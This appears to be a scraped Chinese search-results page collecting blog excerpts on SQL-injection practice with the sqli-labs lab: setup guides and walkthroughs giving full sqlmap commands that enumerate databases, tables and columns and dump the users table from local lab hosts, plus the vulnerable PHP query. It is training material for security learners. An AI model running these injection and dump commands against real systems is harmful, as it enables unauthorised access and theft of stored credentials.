精华内容
下载资源
问答
  • 这个靶场运行在web环境下,需要先安装web环境。将其解压在网站根目录,配置一下db-creds.inc文件中的数据库密码,在浏览器访问本地web服务即可。
  • 网络安全-sqlmap实战之sqlilabs-Less11

    千次阅读 2020-07-10 18:25:51
    更多内容查看:网络安全-自学笔记 喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝...

    目录

    类型

    -dbs枚举数据库

    --tables枚举数据库表

    --columns枚举列

    --dump枚举数据

    查看源代码


    类型

    基于错误-字符串

    登陆成功

    当然,因为之前已经通过sql注入看到了数据库,正常情况下应该是失败,而且网站一般有验证码。

    登录失败
    错误回显

    sql语句猜测

    select * from users where username="参数" and password="参数" LIMIT 0,1

    -dbs枚举数据库

    使用-o参数优化,--batch参数进行跳过

    不必尝试以下语句

    python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --data="username:value1&password=value2&submit=submit" -dbs --batch

    好吧,猜错了,以为就是回显的,还是抓下包吧。

    抓包结果

    可以看到参数名和sql语句中的不一样,是uname和passwd

    python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --data="uname:value1&passwd=value2&submit=Submit" -dbs --batch

    太慢,添加--technique参数指定注入技术,添加--dbms参数指定数据库,添加--threads参数添加线程

    python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --threads 8 --dbms mysql --technique UES --data="uname:value1&passwd=value2&submit=Submit" -dbs --batch

    还是不行。。。

    fuck

     无fuck可说,不知道为什么,有清楚的朋友麻烦评论区告知一下,万分感谢!

    换个思路,既然抓到了包,就使用-r参数读取文件吧,先保存一下,burpsuite中右键,copy to file

    python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" -dbs

     

    搞定

    这也太棒了,一分钟搞定,i了i了,接下来就很容易了

    --tables枚举数据库表

    添加了--dbms,我看速度还很快,没加其他优化

    python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" --dbms mysql -D security --tables --batch

    确实很快,10秒钟

    数据库表

    --columns枚举列

    python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" --dbms mysql -D security -T users --columns --batch

     获取列名

    --dump枚举数据

    python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" --dbms mysql -D security -T users -C username,password -dump --dump-format csv --batch

    看过之前文章的朋友可能发现多了点什么,不错,新学了一个参数--dump-format,可以将结果保存成csv html sqlite形式,我选择了csv,因为一般用python写脚本比较多,csv格式做数据处理更方便。

    数据显示及转储
    csv文件内容

    ----------------------------------------------------202007111更新--------------------------------------------

    今天学习了新的参数,简直太棒了,它就是--forms,看一下速度

    1
    2

     半分钟搞定,sqlmap可以自己抓包。

    总结,对于POST方式的表单,参数有三个

    • --data 需要自己手工找到参数名以及一些信息
    • -r 需要自己抓包
    • --forms sqlmap自动抓包获取参数

    ---------------------------------------------------202007111更新------------------------------------------------

    查看源代码

    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

     更多内容查看:网络安全-自学笔记

    喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。

     

     

    展开全文
  • 引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就...

    引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!

    往期博客:

    [网络安全学习篇49]:渗透测试方法论

    [网络安全学习篇50]:Web架构安全分析

    [网络安全学习篇51]:信息收集

    [网络安全学习篇52]:扫描技术

    [网络安全学习篇53]:口令破解

    [网络安全学习篇附]:DVWA 靶场搭建

    [网络安全学习篇附]:Mutillidae 靶场搭建

    [网络安全学习篇附]:sqli-labs 靶场环境搭建(本篇)

     

    目录

     

    sqli-labs 靶场环境搭建

    搭建环境

    sqli-labs


    sqli-labs 靶场环境搭建

    搭建环境

    phpstudy

    虚拟机:win2008

     

    sqli-labs

    网盘链接   提取码:ohsy

    GitHub:https://github.com/Audi-1/sqli-labs

    解压,将其移动至C:\phpStudy\WWW\下

    修改数据库配置文件

    C:\phpStudy\WWW\sqli-labs\sql-connections\db-creds

    保存退出

    浏览器打开,点击Setup/reset Database for labs 

    创建成功,接下来就可以进行SQL注入的练习了。

    展开全文
  • 目录 类型 注入判断 -u参数 -dbs参数爆数据库 -tables参数爆表 -columns爆列 -dump爆数据 查看源代码 类型 ...python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-2/?id=1" ...

    目录

    类型

    注入判断

    -u参数

     -dbs参数爆数据库

     -tables参数爆表

    -columns爆列

     -dump爆数据

    查看源代码

    查看数据库


    类型

    基于字符串的错误

    注入判断

    ?id=1'

     

    存在sql注入

    根据提示猜测,sql语句大概为

    select * from 表名 where id = 参数 LIMIT 0,1

    -u参数

    python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1"
    sql注入类型

     共发现4种注入类型

    随便测试了一种

     -dbs参数爆数据库

    python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -dbs

     

    数据库

     -tables参数爆表

    python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -tables

    -columns爆列

    python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -columns

     -dump爆数据

    选择把三列数据都爆出来

    python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -C id,username,password -dump
    爆数据

    查看源代码

    sql语句为

    SELECT * FROM users WHERE id='$id' LIMIT 0,1

    查看数据库

    users表

    更多内容查看:网络安全-自学笔记

    有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

    展开全文
  • SQLi Labs实验指导书

    2018-12-23 22:54:41
    sqlilabs, 渗透测试, 网络攻防,数据库安全, mysql,sql
  • 2021年准备在工作之余加强网络安全这块知识的学习,博文主要是记录自己的学习笔记,比较基础。

    2021年准备在工作之余加强网络安全这块知识的学习,博文主要是记录自己的学习笔记,内容比较基础。

    一、SQLi-Labs是什么?

    SQLi-Labs是一个印度程序员写的,是一个专业的SQL注入练习平台,适用于GET和POST场景。

    二、工具准备
    VMware虚拟机:VMware虚拟机下载
    Windows操作系统:操作系统下载
    PHPstudy: phpstudy安装包下载
    sqlis-lab:https://github.com/Audi-1/sqli-labs

    三、安装阶段
    1.安装VMware虚拟机

    2.在虚拟机中安装Windows操作系统

    步骤1,2不做赘述

    3.安装PHPstudy
    3.1 下载
    建议下载2018版本
    在这里插入图片描述

    在这里插入图片描述
    将下载好的安装包拷贝到Windows系统
    在这里插入图片描述
    3.2安装
    在这里插入图片描述

    由于我虚拟机只有一个盘符,便直接安装到了C盘
    在这里插入图片描述

    3.3 配置PHPstudy
    运行软件
    在这里插入图片描述

    修改一下数据库的密码
    在这里插入图片描述
    这里我将其修改为root
    在这里插入图片描述

    4.安装sqli-lab
    4.1下载sqli-lab

    在这里插入图片描述
    4.2安装
    将下载的文件解压放进刚才安装phpstudy的www目录下
    在这里插入图片描述

    4.3配置
    我们只需设置一下数据库的账号密码即可
    路径:C:\phpStudy\PHPTutorial\WWW\sqli-labs-master\sql-connections
    我将账号密码都设置成了root
    在这里插入图片描述

    5.验证环境
    浏览器输入 http://localhost/sqli-labs-master/
    在这里插入图片描述

    点击setup/reset Database for labs

    接着返回点击SQLi-LABS Page-1(Basic Challenges)
    在这里插入图片描述
    至此环境搭建完毕
    在这里插入图片描述

    展开全文
  • 目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类型 单引号注入 单引号报错 ...python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5.
  • 目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类型 ...python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1" -o -dbs --
  • 类型 双层-单引号及括号 获取数据库 python sqlmap.py -u ...--forms参数还是比较快的,针对POST表单有三种方式,可以查看网络安全-sqlmap实战之sqlilabs-Less11中的小总结 之后的获取表名,列名及内..
  • Sqli_Edited_Version.zip

    2020-02-12 20:24:14
    SQLI-LABS是一个学习SQLI的平台,可用于在web安全攻防、SQL注入中进行测试。但是由于新的php版本不兼容问题,原始的sqli会出现问题,这是热心网友修改过的版本,可以在新版本的php中使用。
  • 类型 时间盲注-单引号 -dbs枚举数据库 使用-o参数优化,,--technique参数指定技术,--batch参数进行跳过 ...python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms .
  • 类型 图Less7 -dbs枚举数据库 使用-o参数优化,--batch参数进行跳过 ...python sqlmap.py -u ...python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-7/?id=1"..
  • 数据库 后面的我就不写了,和之前的文章网络安全-sqlmap实战之sqlilabs-Less11一样。不浪费时间了,去跑步了~~~ 更多内容查看:网络安全-自学笔记 喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请...
  • 网络安全-自学笔记

    万次阅读 多人点赞 2020-06-16 17:29:55
    目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 ...网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
  • sqli-labs链接:sqlilabs 第一步:下载解压这个就不细说了 第二步:phpstudy2018打开 这里老师截不上图,我还是说一下吧 ①切换版本这里我选的是php-5.4.45 ②其他选项选择(网站根目录)打开目录后把sqlilabs...
  • 目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类型 双引号注入 双引号 猜测sql语句 ...python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/
  • sqli-labs.zip

    2019-12-31 11:59:26
    sql注入渗透测试环境,易于搭建,学习SQL注入必备环境。 里面一共有60多节课程。 非常不错的安全技术学习资料。
  • 类型 字符串转换错误,他又提示输入数字型ID,应该是把数字...python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" -dbs 4种注入方式 枚举数据库 -tables枚举表 python sqlmap.py -u "192...
  • sqli-labs实验环境

    2019-05-08 14:30:00
    此实验环境包含常见的sql注入漏洞,适用于网络安全初学者,加深了解SQL注入产生的原因,以及如何修复sql注入漏洞
  • 组合:phpstudy2018使用php5.4.45和phpmyadmin还有下载的最新sqlilabs 出现问题:一共两个个问题 ①phpstudy2018在下面mysql打开phpmyadmin直接跳到百度知道首页 (这个问题我也不太清楚但是我知道的是正常安装是...
  • 目录0X01 phpstudy环境安装0X02 火狐浏览器插件安装0X03 sqlmap安装0X04 sqli-labs 安装 0X01 phpstudy环境安装 phpStudy是一个PHP调试环境的程序集成包。 该程序包集成最新的Apache+...
  • SQLI类型

    2020-07-21 14:08:37
    根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inband, inference(推理) 和out-of-band。 Inband技术使用攻击者和有漏洞的Web应用程序之间现有的渠道来提取数据。通常该通道是标准的Web服务器响应。它的...
  • sqli-labs.7z

    2021-08-29 18:25:05
    sqli-labs.7z
  • 目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 ...python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" -dbs -o 枚举数据库 我们已知是mys.
  • 大数据安全和网络安全基础知识

    千次阅读 2021-02-08 22:39:53
    不要把自己的努力看的太重,毕竟大家都在努力 ...报错信息不要过于详细csrf及其总结安全工具篇arp欺骗:address resolution protocolARP协议的原理过程ARP缓存表ARP欺骗kali中有关ARP欺骗的工具ettercaparpsp
  • SQLi LABS Less-27

    万次阅读 2021-08-15 21:18:13
    第27关使用GET请求传递参数,在url中构造payload即可 源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则 ...我们可以使用单引号闭合绕过,保证SQL语法结构正确即可 ...过滤空格的话,我们可以使用...
  • 解决: 利用页面时间延时来判断,代码if (1,sleep(5),1) 如果正确的话就睡眠5s,看一下F12network网络里面的时间进行判断 判断闭合方式 ?id=1" and if((1=1),sleep(5),1) %23 #延时5072ms ?id=1" and if((1=2),...
  • 整体来说漏洞扫描等简单安全工作已经比较熟练,网络安全等技术术语也有一定涉及;虽然日常与运维和网络沟通较少,但日常沟通相比于2019有所提升。同时2020年也出现一个小插曲,7月一直教我技术的同事离职对我今年...
  • sqli-labs通关(less1~less10)_箭雨镜屋-CSDN博客 sqli-labs通关(less11~less20)_箭雨镜屋-CSDN博客 sqli-labs通关(less21~less30)_箭雨镜屋-CSDN博客

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,781
精华内容 712
关键字:

网络安全sqli